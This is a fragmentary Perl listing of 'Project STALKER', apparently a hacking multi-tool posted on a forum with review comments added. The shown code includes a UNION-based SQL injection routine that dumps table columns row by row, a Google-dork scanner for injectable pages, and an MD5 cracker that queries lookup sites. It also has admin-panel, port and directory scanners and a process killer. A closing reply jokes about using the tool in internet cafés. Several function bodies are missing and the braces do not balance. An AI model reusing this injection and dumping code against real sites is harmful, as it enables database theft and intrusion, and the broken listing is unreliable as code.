&reload;
}
}
}
} else {
print "\n[-] mysql.user = ERROR\n\n"; }
}
# NOTE(review): this is the body of the helper called as &dump() from
# menu_options (arguments: page, column 1, column 2, table, bypass token,
# log name); its "sub dump {" line is absent from the listing -- the three
# closing braces on the last line only balance with a sub header.
# Counts the rows of $_[3], then fetches the two named columns one row per
# "limit N,1" request and logs each pair; "ERTOR854" is the reflected marker
# (char(69,82,84,79,82,56,53,52)).
savefile($_[5].".txt","\n");
my $page = $_[0];
($pass1,$pass2) = &bypass($_[4]);
if ($page=~/(.*)hackman(.*)/){
my $start = $1;
my $end = $2;
print "\n\n[+] Extracting values...\n\n"; $concatx = "unhex(hex(concat(char(69,82,84,79,82,56,53,52),count($_[1]),char(69,82,84,79,82,56,53,52))))";
$val_code = toma($start.$concatx.$end.$pass1."from".$pass1.$_[3].$pass2);
$concat = "unhex(hex(concat(char(69,82,84,79,82,56,53,52),$_[1],char(69,82,84,79,82,56,53,52),$_[2],char(69,82,84,79,82,56,53,52))))";
if ($val_code=~/ERTOR854(.*)ERTOR854/ig) {
$tota = $1;
print "[+] Table : $_[3]\n"; print "[+] Length of the rows : $tota\n\n"; print "[$_[1]] [$_[2]]\n\n"; savefile($_[5].".txt","[Table] : $_[3]");
savefile($_[5].".txt","[+] Length of the rows: $tota\n");
savefile($_[5].".txt","[$_[1]] [$_[2]]\n");
for my $limit(0..$tota) {
$injection = toma($start.$concat.$end.$pass1."from".$pass1.$_[3].$pass1."limit".$pass1.$limit.",1".$pass2);
if ($injection=~/ERTOR854(.*)ERTOR854(.*)ERTOR854/ig) {
savefile($_[5].".txt","[$_[1]] : $1 [$_[2]] : $2");
print "[$_[1]] : $1 [$_[2]] : $2\n"; } else {
# First row that does not reflect the marker ends the loop by re-entering
# the menu (no return; the for loop is abandoned by recursion).
print "\n\n[+] Extracting Finish\n\n"; &reload;
}
}
} else {
print "[-] Not Found any DATA\n\n"; }}}
# Maps a bypass token to the (separator, terminator) pair used when building
# request URLs.  Only "/*" and "%20" are handled on the visible line and the
# sub's closing brace is missing, so the case for "--" (the token the kobra
# command passes) is presumably among the lines lost from this listing; as
# shown, an unknown token falls through and returns the false result of the
# last comparison.
sub bypass {
if ($_[0] eq "/*") { return ("/**/","/*"); } elsif ($_[0] eq "%20") { return ("%20","%00"); }
# Body missing from this listing.  Callers use it to turn a string into the
# comma-separated byte list placed inside char(...) (see schemacolumns).
sub ascii {
}
sub base {
# Base64-encode the first argument (MIME::Base64 default line wrapping).
# The result is also stored in the package global $re, as the original did;
# the sub's value is that assignment.
my ($plain) = @_;
return $re = encode_base64($plain);
}
sub base_de {
# Base64-decode the first argument.  The result is also stored in the
# package global $re, as the original did; the sub's value is that assignment.
my ($encoded) = @_;
return $re = decode_base64($encoded);
}
# Fetches URL $_[0] with LWP's mirror() into local path $_[1].  Both branches
# are empty in this listing, so there is no visible return value for the
# caller's "if (download(...))" test; the intended success/failure reporting
# is presumably among the missing lines.
sub download {
if ($nave->mirror($_[0],$_[1])) {
if (-f $_[1]) {
}}}
# Hex encoder used by the "encodehex" command.  Only the "0x" prefix is
# initialised (in the package global $hex); the conversion loop is absent
# and the second "}" below is unmatched in this listing.
sub hex_en {
my $string = $_[0];
$hex = '0x';
}
}
# Hex decoder used by the "decodehex" command.  Strips a leading "0x" from
# the package global $text (never assigned from $_[0] in the visible code);
# the actual decoding is absent from this listing.
sub hex_de {
$text =~ s/^0x//;
}
# Body missing from this listing; used by the "decodeascii" command.
sub ascii_de {
}
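sub getprocess {
# Enumerate running processes through WMI (Win32_Process) and return a hash
# of process caption => process id.  Win32::OLE, which also provides the
# "in" list function, is not among the file's "use" lines in this listing
# -- assumed to be loaded elsewhere.
# Returns an empty list if the WMI locator or the connection cannot be
# obtained, instead of calling a method on an undefined value.
my %procesos;
my $locator = Win32::OLE->new("WbemScripting.SWbemLocator")
    or return %procesos;
my $wmi = $locator->ConnectServer("","root\\cimv2")
    or return %procesos;
foreach my $pro (in $wmi->InstancesOf("Win32_Process")){
    $procesos{$pro->{Caption}} = $pro->{ProcessId};
}
# The caller does "my %re = getprocess()", which the original never
# satisfied because it ended with the foreach and returned nothing useful.
return %procesos;
}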
# Terminates a process with Win32::Process::KillProcess.  The caller passes
# (name, pid), so $numb is the process name and is handed to KillProcess as
# its second (exit-code) argument.  Both branches are empty in this listing,
# so no explicit success value reaches the caller's "if (killprocess(...))".
sub killprocess {
my ($numb,$pid) = @_;
if (Win32::Process::KillProcess($pid,$numb)) {
} else {
}
}
# Body missing from this listing; the "getip <host>" command prints its
# return value as the host's IP address.
sub getip {
}
# Looks up an MD5 hash on several public reverse-lookup sites and appends
# any hit to logs/pass-found.txt as "<hash>:<plaintext>".  Every site is
# tried regardless of earlier hits.
# NOTE(review): the 'variables' values are single-quoted strings, so "$_[0]"
# is never interpolated and tomar() is handed a string, not a hash
# reference; the POST entries therefore do not send the hash as written.
# The 'regex' values are interpolated only when used in the match below.
# The qq(...) regexes are split across lines in this listing.
sub crackit {
my $secret = $_[0];
print "[+] Cracking $_[0]\n\n";
my %hash = (
'http://passcracking.com/' => {
'tipo' => 'post',
'variables'=>'{"datafromuser" => $_[0], "submit" => "DoIT"}',
'regex'=>'<\/td><td>md5 Database<\/td><td>$_[0]<\/td><td bgcolor=#FF0000>(.*)<\/td><td>',
},
'http://md5.hashcracking.com/search.php?md5=' => {
'tipo' => 'get',
'regex' => 'Cleartext of $_[0] is (.*)',
},
'http://www.bigtrapeze.com/md5/' => {
'tipo' => 'post',
'variables'=>'{"query" => $_[0], "submit" => " Crack "}',
'regex' => 'The hash <strong>$_[0]<\/strong> has been deciphered to: <strong>(.+)<\/strong>',
},
'http://opencrack.hashkiller.com/' => {
'tipo' => 'post',
'variables'=>'{"oc_check_md5" => $_[0], "submit" => "Search MD5"}',
'regex' => qq(<\
/div
><div class
="result">$_[0]:(.+)<br\
/>), },
'http://www.hashchecker.com/index.php?_sls=search_hash' => {
'tipo' => 'post',
'variables'=>'{"search_field" => $_[0], "Submit" => "search"}',
'regex' => '<td><li>Your md5 hash is :<br><li>$_[0] is <b>(.*)<\/b> used charl',
},
'http://victorov.su/md5/?md5e=&md5d=' => {
'tipo' => 'get',
# The garbled word below looks like Windows-1251 Cyrillic ("расшифрован",
# "decrypted") read as Latin-1; it is part of the pattern and left as is.
'regex' => qq(MD5 ðàñøèôðîâàí
: <b>(.*)<\
/b
><br><form action
=\
"\">), }
);
for my $data(keys %hash) {
if ($hash{$data}{tipo} eq "get") {
$code = toma($data.$_[0]);
if ($code=~/$hash{$data}{regex}/ig) {
print "\n[+] Decoded : ".$1."\n\n";
saveyes("logs/pass-found.txt",$secret.":".$1);
}
} else {
$code = tomar($data,$hash{$data}{variables});
if ($code=~/$hash{$data}{regex}/ig) {
saveyes("logs/pass-found.txt",$secret.":".$1);
}
}
}
print "\n[+] Finish\n";
}
# Minimal interactive FTP client on Net::FTP.  Logs in with the given
# credentials, then loops on the "menu" label reading one command per line.
# Every command test is an unanchored /g match on the same $cmd, so a line
# can satisfy several of them -- e.g. "rmdir x" also matches the "dir" test
# and lists the directory before removing it.  "exit" and "quit" leave the
# sub with "next", which unwinds to the while(1) loop in the main program
# (Perl warns "Exiting subroutine via next").
sub ftp {
my ($ftp,$user,$pass) = @_;
if (my $socket = Net::FTP->new($ftp)) {
if ($socket->login($user,$pass)) {
print "\n[+] Enter of the server FTP\n\n";
menu:
print "\n\nftp>";
chomp (my $cmd = <stdin>);
print "\n\n";
if ($cmd=~/help/) {
print q(
help : show information
cd : change directory <dir>
dir : list a directory
mdkdir : create a directory <dir>
rmdir : delete a directory <dir>
pwd : directory
del : delete a file <file>
rename : change name of the a file <file1> <file2>
size : size of the a file <file>
put : upload a file <file>
get : download a file <file>
cdup : change dir <dir>
exit : ??
);
}
# Also true for "rmdir ..." (see header comment).
if ($cmd=~/dir/ig) {
if (my @files = $socket->dir()) {
for(@files) {
print "[+] ".$_."\n";
}
} else {
print "\n\n[-] Error\n\n";
}
}
if ($cmd=~/pwd/ig) {
print "[+] Path : ".$socket->pwd()."\n";
}
if ($cmd=~/cd (.*)/ig) {
if ($socket->cwd($1)) {
print "[+] Directory changed\n";
} else {
print "\n\n[-] Error\n\n";
}
}
if ($cmd=~/cdup/ig) {
if (my $dir = $socket->cdup()) {
print "\n\n[+] Directory changed\n\n";
} else {
print "\n\n[-] Error\n\n";
}
}
if ($cmd=~/del (.*)/ig) {
if ($socket->delete($1)) {
print "[+] File deleted\n";
} else {
print "\n\n[-] Error\n\n";
}
}
if ($cmd=~/rename (.*) (.*)/ig) {
if ($socket->rename($1,$2)) {
print "[+] File Updated\n";
} else {
print "\n\n[-] Error\n\n";
}
}
if ($cmd=~/mkdir (.*)/ig) {
if ($socket->mkdir($1)) {
print "\n\n[+] Directory created\n";
} else {
print "\n\n[-] Error\n\n";
}
}
if ($cmd=~/rmdir (.*)/ig) {
if ($socket->rmdir($1)) {
print "\n\n[+] Directory deleted\n";
} else {
print "\n\n[-] Error\n\n";
}
}
if ($cmd=~/exit/ig) {
next;
}
if ($cmd=~/get (.*) (.*)/ig) {
print "\n\n[+] Downloading file\n\n";
if ($socket->get($1,$2)) {
print "[+] Download completed";
} else {
print "\n\n[-] Error\n\n";
}
}
if ($cmd=~/put (.*) (.*)/ig) {
print "\n\n[+] Uploading file\n\n";
if ($socket->put($1,$2)) {
print "[+] Upload completed";
} else {
print "\n\n[-] Error\n\n";
}
}
if ($cmd=~/quit/) {
next;
}
# The connection is never explicitly closed (no $socket->quit) on exit.
goto menu;
} else {
print "\n[-] Failed the login\n\n";
}
} else {
print "\n\n[-] Error\n\n";
}
}
# Directory-listing check.  For every link on the page $_[0] that points at
# the same host (or is relative), strips the file name, fetches the parent
# directory URL and reports it when the body contains "Index Of".  Hits go
# to logs/paths-found.txt.  On the server side this is a series of requests
# for bare directory URLs; disabling autoindex (Apache "Options -Indexes" or
# the equivalent) makes every probe negative.
sub scanpaths {
my $urla = $_[0];
print "\n[+] Find paths in $urla\n\n\n";
my @urls = repes(get_links(toma($urla)));
for $url(@urls) {
my $web = $url;
my ($scheme, $auth, $path, $query, $frag) = uri_split($url);
# $auth is interpolated unescaped into the pattern (host names are plain,
# but a "." in them matches any character here).
if ($_[0] =~/$auth/ or $auth eq "") {
if ($path=~/(.*)\/(.*)\.(.*)$/) {
my $borrar = $2.".".$3;
if ($web=~/(.*)$borrar/) {
my $co = $1;
unless ($co=~/$auth/) {
$co = $urla.$co;
}
$code = toma($co);
if ($code=~/Index Of/ig) {
print "[Link] : ".$co."\n";
saveyes("logs/paths-found.txt",$co);
}}}}}
print "\n\n[+] Finish\n";
}
sub scanport {
# Try a TCP connect (0.5 s timeout) to six well-known ports on host $_[0]
# and print the ones that accept the connection.  Hash iteration order is
# unspecified, so the report order varies between runs.
my %service_of = (
    "21"=>"ftp",
    "22"=>"ssh",
    "25"=>"smtp",
    "80"=>"http",
    "110"=>"pop3",
    "3306"=>"mysql"
);
print "[+] Scanning $_[0]\n\n\n";
for my $port (keys %service_of) {
    # The socket object is only tested for truth; it is discarded right away.
    if (IO::Socket::INET->new(PeerAddr => $_[0], PeerPort => $port, Proto => "tcp", Timeout => 0.5)) {
        print "[Port] : ".$port." [Service] : ".$service_of{$port}."\n";
    }
}
print "\n\n[+] Finish\n";
}
sub scanpanel {
# Request each path of the global @panels list beneath the base URL $_[0];
# print and log (logs/panel-logs.txt) those the server answers with a
# success status.  $path and $code stay package globals, as in the original.
print "[+] Scanning $_[0]\n\n\n";
for $path (@panels) {
    my $candidate = $_[0]."/".$path;
    $code = tomax($candidate);
    next unless $code->is_success;
    print "[Link] : ".$candidate."\n";
    saveyes("logs/panel-logs.txt",$candidate);
}
print "\n\n[+] Finish\n";
}
# Scrapes Google (google.com.ar) result pages for query $a, up to $b results
# in steps of 10, keeps the webcache links and extracts the cached page URL
# from each.  NOTE: @url and @founds are package globals that are never
# cleared, so results of earlier calls in the same session are returned again;
# the "my @founds" on the second-to-last line shadows the global of the same
# name only for the return.
sub google {
my($a,$b) = @_;
# Starts at result offset 10, so the first page of results is skipped.
for ($pages=10;$pages<=$b;$pages=$pages+10) {
$code = toma("http://www.google.com.ar/search?hl=&q=".$a."&start=$pages");
my @links = get_links($code);
for my $l(@links) {
if ($l =~/webcache.googleusercontent.com/) {
push(@url,$l);
}
}
}
for(@url) {
if ($_ =~/cache:(.*?):(.*?)\+/) {
push(@founds,$2);
}
}
my @founds = repes(@founds);
return @founds;
}
# Error-based check used by the scangoogle command: requests the page with a
# malformed UNION appended and reports the URL when the MySQL "different
# number of columns" message is reflected.  Hits go to logs/sql-logs.txt.
# Applications that do not echo database errors never match this test.
# NOTE(review): the string "union\n" is split across two lines in this
# listing, so the literal request contains a newline as shown.
sub sql {
my ($pass1,$pass2) = ("+","--");
my $page = shift;
$code1 = toma($page."-1".$pass1."union
".$pass1."select".$pass1."666".$pass2); if ($code1=~/The used SELECT statements have a different number of columns/ig) {
print "[+] SQLI : $page\a\n";
saveyes("logs/sql-logs.txt",$page);
}}
# Extract every link attribute value from the HTML in $_[0] using
# HTML::LinkExtor with agarrar() as the callback.  The callback pushes onto
# the package global @links, which is never cleared, so each call returns the
# links of every page parsed so far in the session.  The nested named sub
# agarrar is compiled once at file scope, not per call.
sub get_links {
my $test = HTML::LinkExtor->new(\&agarrar)->parse($_[0]);
return @links;
sub agarrar {
# $a is the tag name, %b the attribute => value pairs; only values are kept.
my ($a,%b) = @_;
push(@links,values %b);
}
}
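sub repes {
# Return the arguments with duplicates removed, keeping the first occurrence
# of each value in its original order.
# The original kept the "seen" hash and the result list in package globals
# (%repe, @limpio) that were never cleared, so a second call returned the
# earlier results again and silently dropped anything already seen in the
# session.  Both are lexical here, so every call is independent.
my %seen;
my @unique;
for my $item (@_) {
    push @unique, $item unless $seen{$item}++;
}
return @unique;
}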
sub head {
# Print the program banner in colour 11, then reset the colour.
my $banner = "\n\n-- == Project STALKER == --\n\n";
cprint "\x0311"; #13
print $banner;
cprint "\x030";
}
sub copyright {
# Print the copyright line in colour 11, then reset the colour.
my $notice = "\n\n(C) Doddy Hackman 2011\n\n";
cprint "\x0311"; #13
print $notice;
cprint "\x030";
}
sub toma {
# GET the URL in $_[0] with the shared $nave client and return the body.
my ($url) = @_;
my $response = $nave->get($url);
return $response->content;
}
sub tomax {
# GET the URL in $_[0] with the shared $nave client and return the whole
# response object (callers test ->is_success on it).
my ($url) = @_;
return $nave->get($url);
}
sub tomar {
# POST the key/value pairs of the hash reference $var to $web with the
# shared $nave client and return the response body.
my ($web,$var) = @_;
my @form = %{$var};
my $response = $nave->post($web, \@form);
return $response->content;
}
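sub conectar {
# Open a TCP connection to $_[0]:$_[1] (5 s timeout), send $_[2] followed by
# CRLF, read up to 5000 bytes of the reply and return it with a trailing
# CRLF appended.
# Returns an empty string when the connection cannot be made; the original
# went on to print to an undefined handle in that case.
my ($host, $port, $payload) = @_;
my $sock = IO::Socket::INET->new(
    PeerAddr => $host,
    PeerPort => $port,
    Proto    => "tcp",
    Timeout  => 5,
) or return "";
print {$sock} $payload."\r\n";
# read() returns undef on error; $reply then stays empty.
my $reply = "";
$sock->read($reply, 5000);
$sock->close;
return $reply."\r\n";
}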
# Interactive MySQL query loop over DBI.  The DSN has the positional form
# "dbi:mysql:<database>:<host>:<port>" with an empty database name.  Each
# stdin line is prepared and executed verbatim and the rows are printed
# tab-separated.
# NOTE(review): after reading the query the code disconnects and leaves the
# loop unconditionally, so the "if" that guarded the exit command is missing
# from this listing; the braces at the end do not balance as shown either.
sub enter {
my ($host,$user,$pass) = @_;
print "[+] Connecting to the server\n";
$info = "dbi:mysql::".$host.":3306";
if (my $enter = DBI->connect($info,$user,$pass,{PrintError=>0})) {
print "\n[+] Enter in the database";
while(1) {
print "\n\n\n[+] Query : ";
chomp(my $ac = <stdin>);
$enter->disconnect;
print "\n\n[+] Closing connection\n\n";
last;
}
# Executes without checking the prepare()/execute() results; with
# PrintError off a failure only shows up as rows() returning -1 below.
$re = $enter->prepare($ac);
$re->execute();
my $total = $re->rows();
my @columnas = @{$re->{NAME}};
if ($total eq "-1") {
print "\n\n[-] Query Error\n";
next;
} else {
print "\n\n[+] Result of the query\n";
if ($total eq 0) {
print "\n\n[+] Not rows returned\n\n";
} else {
print "\n\n[+] Rows returned : ".$total."\n\n\n";
for(@columnas) {
print $_."\t\t";
}
print "\n\n";
while (@row = $re->fetchrow_array) {
for(@row) {
print $_."\t\t";
}
print "\n";
}}}}
} else {
print "\n[-] Error connecting\n";
}}
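sub saveyes {
# Append one line ($_[1]) to the file named by $_[0].
# Uses three-argument open with a lexical handle: the mode is kept separate
# from the file name, so a name with leading/trailing whitespace or other
# characters that two-argument open interprets is opened literally, and the
# handle no longer collides with the bareword SAVE shared with savefile().
# Failure to open is reported with a warning rather than ignored; the write
# stays best-effort, as callers never checked a result.
my ($file, $line) = @_;
open(my $fh, '>>', $file) or do {
    warn "[-] Cannot open $file: $!\n";
    return;
};
print {$fh} $line."\n";
close($fh) or warn "[-] Cannot close $file: $!\n";
return;
}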
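sub savefile {
# Append one line ($_[1]) to logs/webs/<$_[0]> relative to the current
# directory.  The directory is not created here (the check at the top of
# the file tests an absolute "/logs/webs" and has an empty body), so a
# missing directory is reported with a warning instead of being ignored.
# Uses three-argument open with a lexical handle, keeping the mode separate
# from the (caller-derived) file name and avoiding the bareword SAVE handle
# shared with saveyes().  The write stays best-effort, as before.
my ($name, $line) = @_;
my $file = "logs/webs/".$name;
open(my $fh, '>>', $file) or do {
    warn "[-] Cannot open $file: $!\n";
    return;
};
print {$fh} $line."\n";
close($fh) or warn "[-] Cannot close $file: $!\n";
return;
}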
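sub coleccionar {
# Return every entry of directory $_[0] exactly as readdir reports it,
# including "." and "..".  Returns an empty list when the directory cannot
# be opened, as the original effectively did.
# Uses a lexical directory handle and closedir(): the original paired
# opendir with close(), which does not apply to a directory handle, so the
# bareword DIR handle was never released.
my ($dir) = @_;
opendir(my $dh, $dir) or return;
my @archivos = readdir($dh);
closedir($dh);
return @archivos;
}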
sub helpme {
# Print the command reference in colour 10, then reset the colour.  The
# text is the same literal the original printed.
my $usage = qq(
Commands :
getinfo
getip <host>
getlink <page>
getprocess
killprocess <name process> <pid process>
conec <host> <port> <command>
allow <host>
paths <page>
encodehex <text>
decodehex <text>
encodeascii <text>
decodeascii <text>
encodebase <text>
decodebase <text>
scanport <host>
panel <page>
getpass <hash>
kobra <page>
ftp <host> <user> <pass>
mysql <host> <user> <pass>
navegator
scangoogle
help
exit
);
cprint "\x0310"; #13
print $usage;
cprint "\x030";
}
#
# The End ?
#
Se ve interesante este proyecto. ¿Qué te motivó a hacerlo? ¿Piensas añadirle más funcionalidades? Podría ser muy útil en cibercafés... jeje ::)